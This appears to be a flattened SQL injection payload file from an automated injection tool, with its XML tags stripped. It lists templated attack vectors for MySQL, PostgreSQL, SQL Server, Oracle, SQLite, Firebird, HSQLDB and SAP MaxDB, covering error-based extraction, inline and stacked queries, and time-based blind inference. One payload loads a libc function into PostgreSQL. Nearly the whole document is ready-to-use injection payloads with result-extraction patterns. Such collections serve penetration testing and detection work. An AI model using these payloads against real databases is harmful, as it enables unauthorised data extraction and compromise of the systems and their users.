- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)
-
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
-
-
- MySQL >= 5.0 error-based - Parameter replace
- 2
- 3
- 0
- 1,2,3
- 3
- (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
- (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)
- 2
- 3
- 0
- 1,2,3
- 3
- (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))
-
- (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
- 2
- 4
- 0
- 1,2,3
- 3
- (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))
-
- (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)
- 2
- 5
- 0
- 1,2,3
- 3
- (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
- (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- PostgreSQL error-based - Parameter replace
- 2
- 3
- 0
- 1,2,3
- 3
- (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
-
- (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase error-based - Parameter replace
- 2
- 3
- 0
- 1,3
- 3
- (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))
-
- (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)
- 2
- 4
- 0
- 1,3
- 3
- (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')
-
- (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle error-based - Parameter replace
- 2
- 3
- 0
- 1,3
- 3
- (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Firebird error-based - Parameter replace
- 2
- 4
- 0
- 1,3
- 3
- (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))
-
- (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
-
-
-
- MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses
- 2
- 3
- 0
- 2,3
- 1
- ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
- ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)
- 2
- 3
- 0
- 2,3
- 1
- ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
- ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)
- 2
- 4
- 0
- 2,3
- 1
- ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
-
- ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)
- 2
- 5
- 0
- 2,3
- 1
- ,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
- ,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- PostgreSQL error-based - GROUP BY and ORDER BY clauses
- 2
- 3
- 0
- 2,3
- 1
- ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
-
- ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase error-based - ORDER BY clause
- 2
- 3
- 0
- 3
- 1
- ,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))
-
- ,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle error-based - GROUP BY and ORDER BY clauses
- 2
- 3
- 0
- 2,3
- 1
- ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
-
-
-
- MySQL inline queries
- 6
- 1
- 1
- 1,2,3,8
- 3
- (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
- (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
-
-
-
-
- PostgreSQL inline queries
- 6
- 1
- 1
- 1,2,3,8
- 3
- (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')
-
- (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase inline queries
- 6
- 1
- 1
- 1,2,3,8
- 3
- (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')
-
- (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle inline queries
- 6
- 1
- 1
- 1,2,3,8
- 3
- (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)
-
- (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- SQLite inline queries
- 6
- 1
- 1
- 1,2,3,8
- 3
- SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'
-
- SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- SQLite
-
-
-
- Firebird inline queries
- 6
- 2
- 1
- 1,2,3,8
- 3
- SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE
-
- SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
-
-
- MySQL > 5.0.11 stacked queries (SELECT)
- 4
- 2
- 0
- 0
- 1
- ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 stacked queries (SELECT - comment)
- 4
- 4
- 0
- 0
- 1
- ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- ; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 stacked queries
- 4
- 1
- 0
- 0
- 1
- ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- ; SELECT SLEEP([SLEEPTIME])
- --
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL < 5.0.12 stacked queries (heavy query)
- 4
- 2
- 2
- 0
- 1
- ; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
- --
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 stacked queries
- 4
- 1
- 0
- 0
- 1
- ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- ; SELECT PG_SLEEP([SLEEPTIME])
- --
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL stacked queries (heavy query)
- 4
- 2
- 2
- 0
- 1
- ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)
- --
-
-
-
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL < 8.2 stacked queries (Glibc)
- 4
- 4
- 0
- 0
- 1
- ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])
- --
-
-
-
-
-
- PostgreSQL
- < 8.2
- Linux
-
-
-
-
- Microsoft SQL Server/Sybase stacked queries
- 4
- 1
- 0
- 0
- 1
- ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
-
- ; WAITFOR DELAY '0:0:[SLEEPTIME]'
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)
- 4
- 5
- 0
- 0
- 1
- ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL
-
- ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (heavy query)
- 4
- 5
- 2
- 0
- 1
- ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL
-
- ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (DBMS_LOCK.SLEEP)
- 4
- 5
- 0
- 0
- 1
- ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END
-
- ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (USER_LOCK.SLEEP)
- 4
- 5
- 0
- 0
- 1
- ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END
-
- ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END
- --
-
-
-
-
-
- Oracle
-
-
-
-
- SQLite > 2.0 stacked queries (heavy query)
- 4
- 3
- 2
- 0
- 1
- ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
- --
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- Firebird stacked queries (heavy query)
- 4
- 3
- 2
- 0
- 1
- ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE
-
- ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4
- --
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- HSQLDB >= 1.7.2 stacked queries
- 4
- 3
- 0
- 0
- 1
- ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END
-
- ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 2.0 stacked queries
- 4
- 4
- 0
- 0
- 1
- ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END
-
- ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 2.0
-
-
-
-
-
-
-
-
- MySQL > 5.0.11 AND time-based blind (SELECT)
- 5
- 1
- 1
- 1,2,3
- 1
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 AND time-based blind (SELECT - comment)
- 5
- 4
- 1
- 1,2,3
- 1
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 AND time-based blind
- 5
- 1
- 1
- 1,2,3
- 1
- AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- AND SLEEP([SLEEPTIME])
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 AND time-based blind (comment)
- 5
- 4
- 1
- 1,2,3
- 1
- AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- AND SLEEP([SLEEPTIME])
- #
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL < 5.0.12 AND time-based blind (heavy query)
- 5
- 2
- 2
- 1,2,3
- 1
- AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL < 5.0.12 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
- #
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 AND time-based blind
- 5
- 1
- 1
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL > 8.1 AND time-based blind (comment)
- 5
- 5
- 1
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
- --
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL AND time-based blind (heavy query)
- 5
- 3
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
- --
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind
- 5
- 1
- 0
- 0
- 1
- IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
-
- WAITFOR DELAY '0:0:[SLEEPTIME]'
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Microsoft SQL Server/Sybase AND time-based blind (heavy query)
- 5
- 2
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle AND time-based blind
- 5
- 1
- 1
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle AND time-based blind (comment)
- 5
- 5
- 1
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle AND time-based blind (heavy query)
- 5
- 2
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
- --
-
-
-
-
-
- Oracle
-
-
-
-
- SQLite > 2.0 AND time-based blind (heavy query)
- 5
- 3
- 2
- 1
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- SQLite > 2.0 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1
- 1
- AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
- --
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- Firebird AND time-based blind (heavy query)
- 5
- 4
- 2
- 1
- 1
- AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- Firebird AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1
- 1
- AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
- --
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- SAP MaxDB AND time-based blind (heavy query)
- 5
- 3
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
